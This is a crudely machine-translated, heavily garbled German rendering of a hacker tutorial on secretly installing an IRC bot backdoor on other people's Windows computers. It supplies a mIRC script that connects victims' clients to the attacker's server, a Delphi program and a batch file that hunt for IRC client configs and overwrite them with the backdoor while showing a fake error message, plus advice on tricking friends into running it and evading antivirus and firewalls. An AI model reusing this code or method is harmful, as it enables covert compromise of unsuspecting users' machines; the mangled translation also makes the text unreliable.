This page has been robot translated, sorry for typos if any. Original content here.

Hängen Sie bieten unter Windows.



1. Intro.
2. Trojaner.
3. mIRC - Skripte.
I. schreiben das Skript Backdoor
II. delphi schreiben auf ein Programm, das eine Backdoor in den Feind einsetzen wird mIRC
III. batch'ah schreiben auf ein Programm, das eine Backdoor in den Feind einsetzen wird mIRC
IV. Soziotechnik: vparivat prog =)
4. Beide Methoden verglichen.
5. Wie sich zu schützen.
6. Outro.

1. In unserer Zeit, darunter beliebte Kanäle Besitzer, ist es Mode geworden chanely ein Dutzend Boote mit verschiedenen Linux - shell'ov zu hängen, zu schaffen , so „Sicherheitskanal.“ Sprechen Natürlich, ich habe nichts gegen jede eggdrop'ov da, aber wie ein Sterblicher Benutzer sein, die weder die Schale noch cc oder Wissen (wie die Elite des Kanals # 31337 auf dem Server irc.dal.net.ru haben =)? So in diesem Artikel werde ich Ihnen zeigen, wie ein Bot auf einer Maschine mit Win-wie OSes aufzuhängen.
Imho gibt es nur zwei Möglichkeiten, diese Trojaner und Trojaner =) beginnen mit dem ersten zu implementieren.

2. Wenn Sie waren MSNE (irc.msn.com) , bevor Sie es schließen, ist es wahrscheinlich Zeit , um die n-nym Anzahl von CMV - Bots auf #russian_chat Kanäle, #russian_girls, #russian_andybig und so weiter zu genießen. So sind diese Bots weit eggdrop'y. Das heißt, SubSeven'y. Ich hörte von diesem Pferd? Sub7 Trojan nur in meinem Gedächtnis, die remoten IRC-Bot hängen können (ich habe nicht Trojans yuzal, so weiß nicht, ob er Analoga erschienen ist). So schütteln Sub'a hier und genießen. Diejenigen, die nicht daran gewöhnt sind, suchen nach einfachen Möglichkeiten, mehr zu lesen.

3. Chancen mIRC-Skripte oochen sogar beeindruckend. Schreiben sie die gleiche CGI-Scanner ist ein geringfügigsten Sache, nicht das anspruchslose Boot zu erwähnen. Nehmen wir zum Beispiel WarSatan Skript. Sie baute nur einen „einfachen Roboter“. Wenn Sie eine Verbindung mit Ihrem Lieblings-irc-Server-Skript vorbei Gastbenutzer auf dem Server zu verbinden und wird irc.webchat.org es auf #CHATOP Kanäle, #MEKAH und #PANGKOR. Das ist der ganze Mechanismus funktioniert. Unsere Aufgabe - die gleiche einfache Backdoor wie Mirko Plugin zu schreiben.
I. Haibolee wichtige Linien äußern.

on 1:CONNECT:{
;#открываем соединение с твоим irc cервером
.sockopen 31337 irc_сервер его_порт
}
on 1:DISCONNECT:{
;#при разрыве соединения убиваем сокет
.sockclose 31337
}
on 1:SOCKOPEN:31337:{
;#авторизуемся на irc-сервере
.sockwrite -n $sockname USER BOT "" "localhost" :Satanic bot
.sockwrite -n $sockname NICK ник_бота $+ $r(1,999)
;#заходим на твой канал
.sockwrite -n $sockname join твой_канал
}
on 1:SOCKREAD:31337:{
;#этот скрипт автоматически отвечает на серверный ping
;#без него сервер будет кидать бота, потому что тот не отвечает на пинги
.sockread %tmp
if ($gettok(%tmp,1,32) == ping) {
.sockwrite -n $sockname PONG $gettok(%tmp,2-,32)
}
}


Wir entfernen Kommentare, wir ihre Werte ersetzen, die Anzahl der Zeilen (kopieren Sie sie einfach alle mIRC-Editor und speichern Sie es - er alles-Zahlen hatte) und die resultierende Datei in control.dll speichern.
Backdoor sich bereit. Jetzt müssen wir es in anderen script.ini einfügen.

II. Hier ist der Quellcode eines Programms auf delphi, die script.ini Datei und, wenn erfolgreiche Ergebnis der Suche zu schrauben sucht, ist es uns ersetzt.

Wichtig! Control.dll sollte mit diesem prog im gleichen Verzeichnis gespeichert werden.

program Project1;

uses
SysUtils,
windows,
shellapi;


const search = 'script.ini'; //файл который нужно найти и заменить
replace = 'control.dll'; //файл, которым надо заменить, должен быть
// в том же месте откуда запуститься эта прога =)


var buf: array [0..255] of char;
fl: PChar;
flag:boolean = false;

//процедура замены файлов
procedure Change(where:pchar);

function CopyFile(FromFile, ToDir : string) : boolean; //функция копирования
var F : TShFileOpStruct;
begin
F.Wnd := 0; F.wFunc := FO_COPY;
FromFile:=FromFile+#0; F.pFrom:=pchar(FromFile);
ToDir:=ToDir+#0; F.pTo:=pchar(ToDir);
F.fFlags := FOF_ALLOWUNDO or FOF_NOCONFIRMATION or FOF_SILENT;
{$I-}
result:=ShFileOperation(F) = 0;
{$I+}
end;

begin
DeleteFile(where);
CopyFile(replace,where)
end;


//процедура глоб. поиска
function Find(DirN: string):boolean;
var
tsr: TSearchRec;
Full: string;

begin
find:=false;
if FindFirst(DirN + '\*.*', faAnyFile, tsr) = 0 then
repeat
if (tsr.Name = '.') or (tsr.Name = '..') then continue;
Full:= DirN + '\' + tsr.Name;
if tsr.Attr = faDirectory then //если каталог
Find(Full);
until (FindNext(tsr) <>0)or(tsr.Name = search)or flag;

if tsr.Name = search //если нашли
then begin
find:=true;
flag:=true;
Change(pchar(DirN+'\'+tsr.Name));
end;

end;


//Основной блок программы
begin
if SearchPath(nil,search,nil,sizeof(buf),buf,fl)>0 then
Change(buf)
else
begin
Find('c:');
// если надо и на других дисках искать то можешь сделать так:
// if Not Find('c:') then
// if Not Find('d:') then
// if Not Find('e:') then
//etc....
end;

end.


III. Wenn Sie nicht mit der alten Codierung und ich geworfen in die Hefe aus dem Wort „Compiler“ beschäftigt sind, lassen Sie sich ein Programm auf batch'ah schreiben.

echo off
cls
if exist mirc.ini goto in_the_same_dir
if exist c:\mirc\MIRC.INI set mirc=c:\mirc
if exist c:\mirc\mirc\MIRC.INI set mirc=c:\mirc\mirc
if exist c:\irc\MIRC.INI set mirc=c:\irc
if exist c:\irc\mirc\MIRC.INI set mirc=c:\irc\mirc
if exist c:\chat\mirc\MIRC.INI set mirc=c:\chat\mirc
if exist c:\chat\MIRC.INI set mirc=c:\chat
if exist c:\progra~1\mirc\MIRC.INI set mirc=c:\progra~1\mirc
if exist c:\chat\looksharp\MIRC.INI set look=c:\chat\looksharp
if exist c:\mirc\looksharp\MIRC.INI set look=c:\mirc\looksharp
if exist c:\irc\looksharp\MIRC.INI set look=c:\irc\looksharp
if exist c:\progra~1\looksharp\MIRC.INI set look=c:\progra~1\looksharp
if exist c:\progra~1\trion\MIRC.INI set neo=c:\progra~1\trion
if exist c:\progra~1\neo-ra\MIRC.INI set neo=c:\progra~1\neo-ra
if exist c:\progra~1\NeoRa\Trion\MIRC.INI set neo=c:\progra~1\NeoRa\Trion
if exist c:\progra~1\NeoRa\MIRC.INI set neo=c:\progra~1\NeoRa
if exist c:\chat\NeoRa\MIRC.INI set neo=c:\chat\NeoRa
if exist c:\irc\NeoRa\MIRC.INI set neo=c:\irc\NeoRa
if exist c:\chat\neo-ra\MIRC.INI set neo=c:\chat\neo-ra
if exist c:\irc\neo-ra\MIRC.INI set neo=c:\irc\neo-ra
if exist c:\chat\Trion\MIRC.INI set neo=c:\chat\Trion
if exist c:\irc\Trion\MIRC.INI set neo=c:\irc\Trion
if exist c:\Trion\MIRC.INI set neo=c:\Trion
if exist c:\NeoRa\MIRC.INI set neo=c:\NeoRa
if exist c:\Neo-ra\MIRC.INI set neo=c:\Neo-ra
if exist d:\chat\NeoRa\MIRC.INI set neo_here=d:\chat\NeoRa
if exist d:\irc\NeoRa\MIRC.INI set neo_here=d:\irc\NeoRa
if exist d:\chat\neo-ra\MIRC.INI set neo_here=d:\chat\neo-ra
if exist d:\irc\neo-ra\MIRC.INI set neo_here=d:\irc\neo-ra
if exist d:\chat\Trion\MIRC.INI set neo_here=d:\chat\Trion
if exist d:\irc\Trion\MIRC.INI set neo_here=d:\irc\Trion
if exist d:\Trion\MIRC.INI set neo=d:\Trion
if exist d:\NeoRa\MIRC.INI set neo=d:\NeoRa
if exist d:\Neo-ra\MIRC.INI set neo=d:\Neo-ra
if exist d:\mirc\MIRC.INI set mirc=d:\mirc
if exist d:\mirc\mirc\MIRC.INI set mirc=d:\mirc\mirc
if exist d:\irc\MIRC.INI set mirc=d:\irc
if exist d:\irc\mirc\MIRC.INI set mirc=d:\irc\mirc
if exist d:\chat\mirc\MIRC.INI set mirc=d:\chat\mirc
if exist d:\chat\MIRC.INI set mirc=d:\chat
if exist d:\looksharp\MIRC.INI set look=d:\looksharp
if exist d:\chat\looksharp\MIRC.INI set look=d:\chat\looksharp
if exist d:\mirc\looksharp\MIRC.INI set look=d:\mirc\looksharp
if exist d:\irc\looksharp\MIRC.INI set look=d:\irc\looksharp
if "%mirc%"=="" goto no_mirc
deltree /y %mirc%\script.ini
copy control.dll %mirc%\script.ini
cls
:no_mirc
if "%look%"=="" goto no_look
deltree /y %look%\System\lookevents04.sys
copy control.dll %look%\System\lookevents04.sys
cls
:no_look
if "%neo%"=="" goto end
deltree /y %neo%\root\trionscr7.ini
copy control.dll %neo%\root\trionscr7.ini
cls
goto end
:in_the_same_dir
deltree /y script.ini
copy control.dll script.ini
:end
echo Your Microsoft Windows is not correctly installed.
echo Pleas re-install it and try again

Dieses Kanu zufällig sucht mIRC, Neora Trion und Looksharp. Die Wahrscheinlichkeit, ein ziemlich unbedeutend zu finden, so ist es ratsam, auf das Thema vorherrschen diese Datei zusammen im selben Verzeichnis wie die IRC-Clients mit control.dll setzen. Im Fall eines erfolgreichen Abschlusses der Suche, ersetzt die Datei mit dem ausländischen script.ini unsere control.dll.
Wandeln Sie diese bat'nik in exe'shnik einige bat2exec'om und können Ihre Freunde vparivat.

IV. Ich denke, es ist nicht für mich, Ihnen zu erzählen, wie „vparivat“ jemand exe'shnik. Ich will nur ein Merkmal betonen. Gib es zu, starten Sie bitte Ihre exe'shnik vyzyvet Verdacht selbst die engstirnigen Benutzer. So können Sie den anderen Weg gehen. Um dies zu tun, gehen Sie zurück ist I. zu Schritt nicht Zeilen des Skripts nummeriert, nur schiebt es in joke.mrc Datei. Alles. gib es jetzt weg an Ihre Freunde mit den Worten: legen Sie sie in das Verzeichnis mit Ihrer kleinen Welt, geben Sie in die Konsole „/ Last -rs joke.mrc“ und genießen Sie alle Freuden des Plugins =)

4. Und ja, was ist die Methode , mit der Substitution script.ini besser?
1) nicht durch Antivirus erwischt
2) nicht gefangen FairWall'ami. Ich denke, viele sofort schäumende Mund wird, dass Zonealarm beweisen und AtGuard oberegut sie von ihm. Das Besondere an ihnen, wenn mIRC in diesen beiden fairvol als erlaubt Server \ Client registriert zu erklären, dann auch die PV piknet wenn eine Backdoor-Verbindung zu öffnen.
3) es ist schwierig zu finden \ tötet sogar einen erfahrenen Benutzer

5. Jetzt darüber , wie sie sich schützen können . Noch einmal, ich werde die Methode Sub7'om nicht berücksichtigen (weil ihm alles klar: AVP + Zonealarm), sofort bewegen auf die zweite.
Um festzustellen, sollte der Backdoor-Skript einig mIRC Plugin vrodi IPSearch'a verwenden, die auf dem Server des Benutzers mit dem gleichen Ipomoea wie Sie aussehen würden. Wenn es eine ist, bedeutet es, jemand definitiv hing an Ihrem Bot auf. Wenn diese nicht gefunden wird, dann das Boot oder auf einem anderen Server, oder sind Sie sauber.
Auch für den Nachweis von Bot können Sie die gleiche ZAlarm verwenden: zur Zeit, der große IRC-Server, überprüfen Sie alle Clients auf den Proxy. Auf welche Weise? Eine einfache Port-Scan. Also, wenn Sie an den Server irc.some.com verbinden, ein Port an cha jede irc.lame.com durchsucht, es lohnt zadumkatsya ...
Wie die Backdoor zu töten? Wenn Sie das Scripting nicht verstehen, installieren Sie nur IRC-Client.

6. Was kann abschließend gesagt werden? Nicht yuzayte unbekanntes Skripte und andere nicht zwingen, es zu tun =)